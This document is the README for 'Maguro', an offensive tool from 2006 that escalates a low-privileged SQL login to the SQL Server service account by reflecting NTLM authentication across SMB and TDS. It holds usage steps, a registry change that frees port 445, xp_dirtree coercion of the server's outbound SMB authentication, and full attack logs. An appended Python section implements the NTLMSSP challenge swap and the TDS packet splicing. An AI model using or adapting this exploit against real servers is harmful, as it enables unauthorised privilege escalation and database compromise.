### MAGURO - NTLMSSP puppeteer ###
### MS SQL server remote privilege escalation ###
### (beta release) ###
### ARGENISS -- 2006 ###


Brief Description
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Maguro tunnels a TDS/SQL connection from a non-privileged user to a target SQL
server. The tunnel juggles the NTLMSSP packets carried inside the TDS/SQL
connection and escalates privileges to those of the account the SQL server is
running as (it won't work if SQL Server is running under the Local System
account), using the well known and documented MITM attack against NTLM
authentication, which has existed for several years now (the first detailed
write-up I remember comes from smbrelay's author, Sir Dystic of CULT OF THE
DEAD COW [0]). To do so, it forces the target SQL server to connect and
authenticate itself to the attacker's machine; the server's own NTLM response
is then reflected back at it over the TDS login, so this is a cross-protocol
(SMB to TDS) reflection rather than a plain SMB-to-SMB relay.

See the 'How does this work ???' section for a deeper explanation of the inner
workings.


Tested on
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

. Windows 2000 SP4 + SQL Server 2000


Usage demonstration
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Currently the tunnel requires an existing DSN to the target SQL server. A DSN
should exist in most cases, or see [1] to learn how to create one. The DSN must
use Windows authentication (a trusted connection): the tunnel works on the
NTLMSSP packets inside the TDS login, and a SQL Server login carries none.

We use the supplied client sample, cli.py, which basically:

 a) connects to the provided DSN
 b) tries to create a TABLE using the following SQL query:

    create table katakuris (line varchar(42))

You can modify the sample client to execute whatever operation you fancy.

Let's see what happens when we run the sample client logged in as a user
without enough permissions, without using our tool:

>cli.py w2ks-sql2000
[.] connecting to server w2ks-sql2000...
[!] connected to server w2ks-sql2000 OK
Traceback (most recent call last):
  File "C:\tmp\cli.py", line 55, in ?
    print cursor.execute("create table katakuris (line varchar(42))")
dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]CREATE TABLE permission denied in database 'master'. in EXEC

We get the expected permission denied error message.

So, what we need to do is:

 a) configure a DSN similar to the one we want to abuse, but point it at the
    localhost address where the tunnel listens (this is going to be our tunnel
    DSN)

 b) start maguro.py:

    usage: maguro.py tunnel_local_ip sql_server_ip sql_server_DSN

    for example:

    >maguro.py 192.168.60.1 192.168.60.131 w2ks-sql2000

    where:

      192.168.60.1    is the tunnel's local IP address
      192.168.60.131  is the target SQL server's IP address
      w2ks-sql2000    is the DSN we want to abuse

 b.1) you need to configure your box not to listen on port 445, so that our
      tunnel can listen on it and forward connections to the server's SMB
      server:

      Key:     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
      Value:   SmbDeviceEnabled
      Type:    DWORD value (REG_DWORD)
      Content: 0 (to disable)

      After a reboot, TCP port 445 will no longer be opened by the NetBT
      driver. Check with "netstat -an" that nothing is bound to 445 before
      starting the tunnel, otherwise the SQL server's SMB connection will be
      answered by your own SMB server instead of SMBTuna.

Now we use the sample client, but this time we tell it to connect through the
localhost tunnel DSN (w2ks-sql2000-tunnel instead of w2ks-sql2000):

>cli.py w2ks-sql2000-tunnel
[.] connecting to server w2ks-sql2000-tunnel...
[!] connected to server w2ks-sql2000-tunnel OK
Traceback (most recent call last):
  File "C:\tmp\cli.py", line 55, in ?
    print cursor.execute("create table katakuris (line varchar(42))")
dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'katakuris' in the database. in EXEC

This time it worked: our non-privileged user was able to execute an arbitrary
query !!! (The error is no longer "permission denied" but "already exists":
CREATE TABLE got past the permission check, and only fails here because the
table was created by an earlier tunnelled run.)


How does this work ???
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Let's analyze maguro's sample output:

### MAGURO - NTLMSSP puppeteer ###
### MS SQL server remote privilege agitator ###
### ARGENISS 2006 ###

0] banner

[---] waiting for SQL client connection

1] the tunnel is waiting for our SQL client connection

[***] got evil SQL client

2] our client connected to the tunnel's local IP

[***] got SQL server CHALLENGE

3] the tunnel connected itself to the target SQL server and relayed the
   client's packets to it; the server challenges the client to authenticate
   (an NTLMSSP Type 2 message carried inside a TDS packet), and the tunnel
   records the 8-byte challenge

[---] challenging SQL server SMB client with the SQL server challenge
[-] getting SMB connection from SQL server (DSN=w2ks-sql2000)

4] so the tunnel connects to the SQL server and forces it to connect to 'our'
   share using xp_dirtree (executable by public by default on SQL Server 2000,
   which is why a low-privileged login is enough to trigger the outbound SMB
   connection; the share is on the tunnel's IP address, so the SQL server
   authenticates with NTLM). The tunnel then forwards the SMB packets to the
   SQL server's own SMB server; when we observe the SMB server challenging the
   SQL server, we replace that challenge with the one we got from the SQL
   server itself in step 3

[***] got SQL server SMB client RESPONSE

5] we capture the SQL server's response to its own challenge (the whole
   NTLMSSP Type 3: LM and NT responses, domain, user, host and session key)

[***] authenticating to SQL server as user A d m i n i s t r a t o r
[---] sending response to SQL server

6] and we send it to the SQL server itself, in place of our client's own Type 3
   inside the TDS login (names print with spaces because NTLMSSP carries them
   as UTF-16LE)

[---] tunneling evil client...
7] it's done, now we just tunnel the SQL client to the SQL server


Sample fully verbose output
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

>maguro.py 192.168.60.131
### MAGURO - NTLMSSP puppeteer ###
### MS SQL server remote privilege agitator ###
### ARGENISS 2006 ###
usage: maguro.py tunnel_local_ip sql_server_ip sql_server

>maguro.py 192.168.60.1 192.168.60.131 w2ks-sql2000
### MAGURO - NTLMSSP puppeteer ###
### MS SQL server remote privilege agitator ###
### ARGENISS 2006 ###
[---] waiting for SQL client connection
[-] new TDS client 127.0.0.1
[-] connected to remote SQL server 192.168.60.131
[***] got evil SQL client
========================================
[1->] SQL client -> TDS tunnel
[2->] SQL client -> TDS tunnel -> SQL server
========================================
[3<-] TDS tunnel <- SQL server
[4<-] SQL client <- TDS tunnel <- SQL server
========================================
[1->] SQL client -> TDS tunnel
[2->] SQL client -> TDS tunnel -> SQL server
========================================
[3<-] TDS tunnel <- SQL server
!! NTLMSSP: GOT CHALLENGE !!
----------------------------------------
[challenge - 8 bytes]
0b 62 83 ca a8 36 71 f4
----------------------------------------
[4<-] SQL client <- TDS tunnel <- SQL server
[***] got SQL server CHALLENGE
[---] challenging SQL server SMB client with the SQL server challenge
[-] SMBTuna, waiting for SQL server to connect to SMB tunnel...
[-] getting SMB connection from SQL server (DSN=w2ks-sql2000)
[-] SMBTuna, SQL server 192.168.60.131 connected to SMB
[-] SMBTuna, connected to remote SMB server 192.168.60.131
========================================
[a->] SMB client -> SMB tunnel
[b->] SMB client -> SMB tunnel -> SMB server
========================================
[c<-] SMB tunnel <- SMB server
[d<-] SMB client <- SMB tunnel <- SMB server
========================================
[a->] SMB client -> SMB tunnel
!! NTLMSSP: STARTED NEGOTIATING !!
[b->] SMB client -> SMB tunnel -> SMB server
========================================
[c<-] SMB tunnel <- SMB server
!! NTLMSSP: GOT CHALLENGE !!
----------------------------------------
[challenge - 8 bytes]
2f 31 e1 ca 9d ab 88 db
----------------------------------------
----------------------------------------
[SMB server challenge - 8 bytes]
2f 31 e1 ca 9d ab 88 db
----------------------------------------
[-] SMBTuna, modifying challenge with SQL server challenge:
----------------------------------------
[SQL server challenge - 8 bytes]
0b 62 83 ca a8 36 71 f4
----------------------------------------
[d<-] SMB client <- SMB tunnel <- SMB server
========================================
[a->] SMB client -> SMB tunnel
!! NTLMSSP: GOT AUTH !!
[b->] SMB client -> SMB tunnel -> SMB server
========================================
[c<-] SMB tunnel <- SMB server
[d<-] SMB client <- SMB tunnel <- SMB server
========================================
[a->] SMB client -> SMB tunnel
[b->] SMB client -> SMB tunnel -> SMB server
========================================
[c<-] SMB tunnel <- SMB server
[d<-] SMB client <- SMB tunnel <- SMB server
========================================
[a->] SMB client -> SMB tunnel
!! NTLMSSP: STARTED NEGOTIATING !!
[b->] SMB client -> SMB tunnel -> SMB server
========================================
[c<-] SMB tunnel <- SMB server
!! NTLMSSP: GOT CHALLENGE !!
----------------------------------------
[challenge - 8 bytes]
f0 7b 2e bb 18 e0 f9 82
----------------------------------------
----------------------------------------
[SMB server challenge - 8 bytes]
f0 7b 2e bb 18 e0 f9 82
----------------------------------------
[-] SMBTuna, modifying challenge with SQL server challenge:
----------------------------------------
[SQL server challenge - 8 bytes]
0b 62 83 ca a8 36 71 f4
----------------------------------------
[d<-] SMB client <- SMB tunnel <- SMB server
========================================
[a->] SMB client -> SMB tunnel
!! NTLMSSP: GOT AUTH !!
[-] SMBTuna, got SQL server response to challenge
----------------------------------------------------------------------------
** NTLMSSP:type=3
----------------------------------------
[lmresponse - 24 bytes]
2a fe 49 f5 e7 09 92 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
----------------------------------------
----------------------------------------
[ntlmresponse - 24 bytes]
05 e3 ce 38 88 45 c5 bb 44 6b c4 b9 ee d8 b3 06 f9 5b c1 0d 21 43 bd 14
----------------------------------------
- domain W 2 K S E R V E R
- user m a g u r o
- host W 2 K S E R V E R
----------------------------------------
[sessionKey - 16 bytes]
11 76 b7 fc 56 11 bd bd 9f 95 a2 25 fb 9c f1 ca
----------------------------------------
----------------------------------------------------------------------------
[***] got SQL server SMB client RESPONSE
[***] authenticating to SQL server as user m a g u r o
[---] sending response to SQL server
========================================
[1->] SQL client -> TDS tunnel
[-] client TDS paquet: type 17 status 1 size 142/8e
!! NTLMSSP: GOT AUTH !!
[-] data NTLMSSP len is 134
[-] new NTLMSSP len is 249
[-] changing TDS size to 257/0x101
[-] original data len -> 142
[-] updated data len -> 257
[2->] SQL client -> TDS tunnel -> SQL server
========================================
[3<-] TDS tunnel <- SQL server
[4<-] SQL client <- TDS tunnel <- SQL server
[---] tunneling evil client...
[-] TDSTuna, tunneling master requests...
========================================
[1->] SQL client -> TDS tunnel
[2->] SQL client -> TDS tunnel -> SQL server
========================================
[3<-] TDS tunnel <- SQL server
[4<-] SQL client <- TDS tunnel <- SQL server
========================================
[1->] SQL client -> TDS tunnel
[2->] SQL client -> TDS tunnel -> SQL server


References
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[0] smbrelay by Sir Dystic of CULT OF THE DEAD COW
    http://en.wikipedia.org/wiki/SMBRelay
    http://209.85.165.104/search?q=cache:7nrEcI3Vkf0J:www.xfocus.net/articles/200305/smbrelay.html+smbrelay&hl=es&gl=es&ct=clnk&cd=1&client=firefox-a

[1] Creating a new ODBC DSN
    http://www.truthsolutions.com/sql/odbc/creating_a_new_odbc_dsn.htm
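The following is an added worked example for the 'How does this work ???'
section and the verbose log above; it is not maguro's code and not part of the
original release. It shows the two pieces of wire handling steps 3 to 6 depend
on: locating and overwriting the 8-byte ServerChallenge in an NTLMSSP Type 2
message, pulling the responses and names out of a Type 3 message through its
security-buffer descriptors (the MS-NLMP layouts), and splicing the reflected
Type 3 into the client's TDS SSPI packet (type 17) while rewriting the
big-endian Length in the 8-byte TDS header, which is what the "changing TDS
size" lines in the log do. The challenge, response and session-key bytes are
the ones printed in the log; the NTLMSSP flag values, the target name and the
low-privileged client's identity (W2KS\lowpriv on ATTACKER) are constructed
for the demo.

```python
import struct

# Added example (not maguro's code): NTLMSSP message surgery plus TDS re-framing.
# Challenge/response bytes come from the log; flags, target name and the evil
# client's identity are constructed.

NTLMSSP = b"NTLMSSP\x00"

def ntlm_type(msg):
    """Message type: 1 = NEGOTIATE, 2 = CHALLENGE, 3 = AUTHENTICATE."""
    if not msg.startswith(NTLMSSP) or len(msg) < 12:
        raise ValueError("not an NTLMSSP message")
    return struct.unpack_from("<I", msg, 8)[0]

def get_challenge(type2):
    """ServerChallenge is the 8 bytes at offset 24 of a CHALLENGE_MESSAGE."""
    if ntlm_type(type2) != 2:
        raise ValueError("expected a Type 2 message")
    return type2[24:32]

def set_challenge(type2, challenge):
    """SMBTuna's move: make the SQL server's SMB client answer the SQL server's challenge."""
    if ntlm_type(type2) != 2 or len(challenge) != 8:
        raise ValueError("need a Type 2 message and an 8-byte challenge")
    return type2[:24] + challenge + type2[32:]

def _field(msg, off):
    """Resolve a (Len, MaxLen, Offset) security-buffer descriptor to its bytes."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]

def parse_type3(type3):
    """What maguro prints for a Type 3: descriptors sit at fixed offsets 12..52."""
    if ntlm_type(type3) != 3:
        raise ValueError("expected a Type 3 message")
    return {"lm": _field(type3, 12), "nt": _field(type3, 20),
            "domain": _field(type3, 28).decode("utf-16-le"),
            "user": _field(type3, 36).decode("utf-16-le"),
            "host": _field(type3, 44).decode("utf-16-le"),
            "session_key": _field(type3, 52)}

def build_type2(challenge, target_name="", flags=0x00008201):
    """48-byte CHALLENGE_MESSAGE header + target name (constructed, flags assumed)."""
    name = target_name.encode("utf-16-le")
    hdr = NTLMSSP + struct.pack("<I", 2)
    hdr += struct.pack("<HHI", len(name), len(name), 48)        # TargetNameFields
    hdr += struct.pack("<I", flags) + challenge + b"\x00" * 8    # flags, challenge, reserved
    hdr += struct.pack("<HHI", 0, 0, 48 + len(name))            # TargetInfoFields (empty)
    return hdr + name

def build_type3(lm, nt, domain, user, host, session_key=b"", flags=0x00008205):
    """64-byte AUTHENTICATE_MESSAGE header (no Version/MIC) + payloads (constructed)."""
    payloads = [lm, nt, domain.encode("utf-16-le"), user.encode("utf-16-le"),
                host.encode("utf-16-le"), session_key]
    hdr, body, off = NTLMSSP + struct.pack("<I", 3), b"", 64
    for p in payloads:
        hdr += struct.pack("<HHI", len(p), len(p), off)
        body += p
        off += len(p)
    return hdr + struct.pack("<I", flags) + body

TDS_SSPI = 0x11       # packet type 17, the "client TDS paquet: type 17" in the log
TDS_HDR = ">BBHHBB"   # Type, Status, Length, SPID, PacketID, Window (big-endian)

def tds_header(pkt):
    """(type, status, length) of a TDS packet; Length includes the 8-byte header."""
    ptype, status, length = struct.unpack_from(TDS_HDR, pkt, 0)[:3]
    return ptype, status, length

def splice_tds_sspi(pkt, new_ntlmssp):
    """Swap the NTLMSSP payload of an SSPI packet and fix Length ("changing TDS size")."""
    ptype, status, length, spid, pid, win = struct.unpack_from(TDS_HDR, pkt, 0)
    if ptype != TDS_SSPI or length != len(pkt):
        raise ValueError("not a well-formed TDS SSPI packet")
    return struct.pack(TDS_HDR, ptype, status, 8 + len(new_ntlmssp), spid, pid, win) + new_ntlmssp

def reflect_demo():
    """Steps 3-6 of the explanation, with the bytes from the log."""
    sql_challenge = bytes.fromhex("0b6283caa83671f4")   # step 3: SQL server -> tunnel (TDS)
    smb_challenge = bytes.fromhex("2f31e1ca9dab88db")   # step 4: SMB server -> tunnel (SMB)
    forwarded = set_challenge(build_type2(smb_challenge, "W2KSERVER"), sql_challenge)
    # step 5: the SQL server's SMB client answers `forwarded`, i.e. its own challenge
    lm = bytes.fromhex("2afe49f5e709924d") + b"\x00" * 16   # client nonce + 16 zero bytes
    nt = bytes.fromhex("05e3ce388845c5bb446bc4b9eed8b306f95bc10d2143bd14")
    key = bytes.fromhex("1176b7fc5611bdbd9f95a225fb9cf1ca")
    reflected = build_type3(lm, nt, "W2KSERVER", "maguro", "W2KSERVER", key)
    # step 6: the evil client's Type 3 (constructed identity) is replaced inside its TDS packet
    evil = build_type3(b"\x00" * 24, b"\x00" * 24, "W2KS", "lowpriv", "ATTACKER")
    client_pkt = struct.pack(TDS_HDR, TDS_SSPI, 1, 8 + len(evil), 0, 1, 0) + evil
    server_pkt = splice_tds_sspi(client_pkt, reflected)
    return get_challenge(forwarded), parse_type3(server_pkt[8:]), tds_header(server_pkt)

if __name__ == "__main__":
    chal, auth, hdr = reflect_demo()
    print(chal.hex(), auth["domain"], auth["user"], auth["host"], hdr)
```

The whole Type 3 is forwarded untouched: the LM field in the log (8 random
bytes followed by 16 zeros) is the client nonce of an NTLM2-session-style
response, and the NT response is bound to that nonce, so the two fields must
stay together. Only the TDS Length field is recomputed, since the reflected
Type 3 is longer than the one the evil client sent.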